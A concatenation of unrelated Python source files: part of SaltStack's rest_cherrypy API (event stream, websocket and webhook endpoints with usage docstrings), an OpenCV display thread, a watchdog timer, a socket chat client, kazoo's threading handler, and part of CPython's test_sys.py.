* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n" # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield "tag: {}\n".format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield "data: {}\n\n".format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
VideoShow.py
|
from threading import Thread
import cv2
class VideoShow:
"""
Class that continuously shows a frame using a dedicated thread.
"""
def __init__(self, frame=None,source = None):
self.frame = frame
self.stopped = False
self.source = source
def start(self):
Thread(target=self.show, args=()).start()
return self
def show(self):
while not self.stopped:
cv2.imshow(self.source, self.frame)
if cv2.waitKey(1) == ord("q"):
self.stopped = True
def stop(self):
self.stopped = True
|
watchdog.py
|
import time
import threading
class WatchDog(object):
def __init__(self, timeout_func, timeout_in_seconds=10):
self.last_activity = time.time()
self.timeout_in_seconds = timeout_in_seconds
self.timeout_func = timeout_func
def run(self):
watchdog_thread = threading.Thread(target=self._watchdog)
self.process_still_active()
watchdog_thread.start()
def _watchdog(self):
while time.time() - self.last_activity < self.timeout_in_seconds:
time.sleep(1)
self.timeout_func()
def process_still_active(self):
self.last_activity = time.time()
|
Main_Client.py
|
import socket, selectors, threading, sys
import tkinter as tk
import Message_Client, gui
from Custom_Errors import *
def start_connection(host,port,name):
addr = (host, port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.connect_ex(addr) # Connecting to server
print("Connecting to: " + repr(addr))
events = selectors.EVENT_WRITE
message = Message_Client.Message(sel, sock, addr, Name=name,RoomID=0)
sel.register(sock, events, data=message)
def Client_loop(main_window):
while True:
events = sel.select(timeout=1)
for key, mask in events:
message = key.data
try:
#message.position = main_window.my_position()
#print("message.position:",message.position)
message.process(mask,main_window)
#main_window.update_positions(message.message) # Updating positions in the GUI
except ServerDisconnectError:
print("Server closed connection.")
message.close()
except Exception:
print("Something went wrong with 'message.process(mask)'")
message.close()
# Check for a socket being monitored to continue.
if not sel.get_map():
sel.close()
break
######## PROGRAM STARTS HERE #########
if __name__ == '__main__':
input_form = tk.Tk() # Starting a form where we ask for the name of the user
input_window = gui.name_input_window(input_form)
input_window.pack()
input_form.mainloop()
name = input_window.name
del input_form # We dont need it anymore
if name is not None:
# Connecting to server
sel = selectors.DefaultSelector()
host, port = ['127.0.0.1', 65432]
start_connection(host, port, name)
# Starting the main application
root = tk.Tk()
mainWindow = gui.window(root, name)
mainWindow.pack()
Client_thread = threading.Thread(target = Client_loop, args=(mainWindow,),daemon=True).start()
root.mainloop()
sys.exit()
|
threading.py
|
"""A threading based handler.
The :class:`SequentialThreadingHandler` is intended for regular Python
environments that use threads.
.. warning::
Do not use :class:`SequentialThreadingHandler` with applications
using asynchronous event loops (like gevent). Use the
:class:`~kazoo.handlers.gevent.SequentialGeventHandler` instead.
"""
from __future__ import absolute_import
import errno
import logging
import select
import socket
import threading
import time
import kazoo.python2atexit as python2atexit
try:
import Queue
except ImportError: # pragma: nocover
import queue as Queue
from kazoo.handlers import utils
# sentinel objects
_STOP = object()
log = logging.getLogger(__name__)
class KazooTimeoutError(Exception):
pass
class AsyncResult(utils.AsyncResult):
"""A one-time event that stores a value or an exception"""
def __init__(self, handler):
super(AsyncResult, self).__init__(handler,
threading.Condition,
KazooTimeoutError)
class SequentialThreadingHandler(object):
"""Threading handler for sequentially executing callbacks.
This handler executes callbacks in a sequential manner. A queue is
created for each of the callback events, so that each type of event
has its callback type run sequentially. These are split into two
queues, one for watch events and one for async result completion
callbacks.
Each queue type has a thread worker that pulls the callback event
off the queue and runs it in the order the client sees it.
This split helps ensure that watch callbacks won't block session
re-establishment should the connection be lost during a Zookeeper
client call.
Watch and completion callbacks should avoid blocking behavior as
the next callback of that type won't be run until it completes. If
you need to block, spawn a new thread and return immediately so
callbacks can proceed.
.. note::
Completion callbacks can block to wait on Zookeeper calls, but
no other completion callbacks will execute until the callback
returns.
"""
name = "sequential_threading_handler"
timeout_exception = KazooTimeoutError
sleep_func = staticmethod(time.sleep)
queue_impl = Queue.Queue
queue_empty = Queue.Empty
def __init__(self):
"""Create a :class:`SequentialThreadingHandler` instance"""
self.callback_queue = self.queue_impl()
self.completion_queue = self.queue_impl()
self._running = False
self._state_change = threading.Lock()
self._workers = []
def _create_thread_worker(self, queue):
def _thread_worker(): # pragma: nocover
while True:
try:
func = queue.get()
try:
if func is _STOP:
break
func()
except Exception:
log.exception("Exception in worker queue thread")
finally:
queue.task_done()
except self.queue_empty:
continue
t = self.spawn(_thread_worker)
return t
def start(self):
"""Start the worker threads."""
with self._state_change:
if self._running:
return
# Spawn our worker threads, we have
# - A callback worker for watch events to be called
# - A completion worker for completion events to be called
for queue in (self.completion_queue, self.callback_queue):
w = self._create_thread_worker(queue)
self._workers.append(w)
self._running = True
python2atexit.register(self.stop)
def stop(self):
"""Stop the worker threads and empty all queues."""
with self._state_change:
if not self._running:
return
self._running = False
for queue in (self.completion_queue, self.callback_queue):
queue.put(_STOP)
self._workers.reverse()
while self._workers:
worker = self._workers.pop()
worker.join()
# Clear the queues
self.callback_queue = self.queue_impl()
self.completion_queue = self.queue_impl()
python2atexit.unregister(self.stop)
def select(self, *args, **kwargs):
# select() takes no kwargs, so it will be in args
timeout = args[3] if len(args) == 4 else None
# either the time to give up, or None
end = (time.time() + timeout) if timeout else None
while end is None or time.time() < end:
if end is not None:
args = list(args) # make a list, since tuples aren't mutable
args[3] = end - time.time() # set the timeout to the remaining time
try:
return select.select(*args, **kwargs)
except select.error as ex:
# if the system call was interrupted, we'll retry until timeout
# in Python 3, system call interruptions are a native exception
# in Python 2, they are not
errnum = ex.errno if isinstance(ex, OSError) else ex[0]
if errnum == errno.EINTR:
continue
raise
# if we hit our timeout, lets return as a timeout
return ([], [], [])
def socket(self):
return utils.create_tcp_socket(socket)
def create_connection(self, *args, **kwargs):
return utils.create_tcp_connection(socket, *args, **kwargs)
def create_socket_pair(self):
return utils.create_socket_pair(socket)
def event_object(self):
"""Create an appropriate Event object"""
return threading.Event()
def lock_object(self):
"""Create a lock object"""
return threading.Lock()
def rlock_object(self):
"""Create an appropriate RLock object"""
return threading.RLock()
def async_result(self):
"""Create a :class:`AsyncResult` instance"""
return AsyncResult(self)
def spawn(self, func, *args, **kwargs):
t = threading.Thread(target=func, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def dispatch_callback(self, callback):
"""Dispatch to the callback object
The callback is put on separate queues to run depending on the
type as documented for the :class:`SequentialThreadingHandler`.
"""
self.callback_queue.put(lambda: callback.func(*callback.args))
|
test_sys.py
|
from test import support
from test.support.script_helper import assert_python_ok, assert_python_failure
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, "pyston_version_info"), "Pyston disables recursion checking")
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
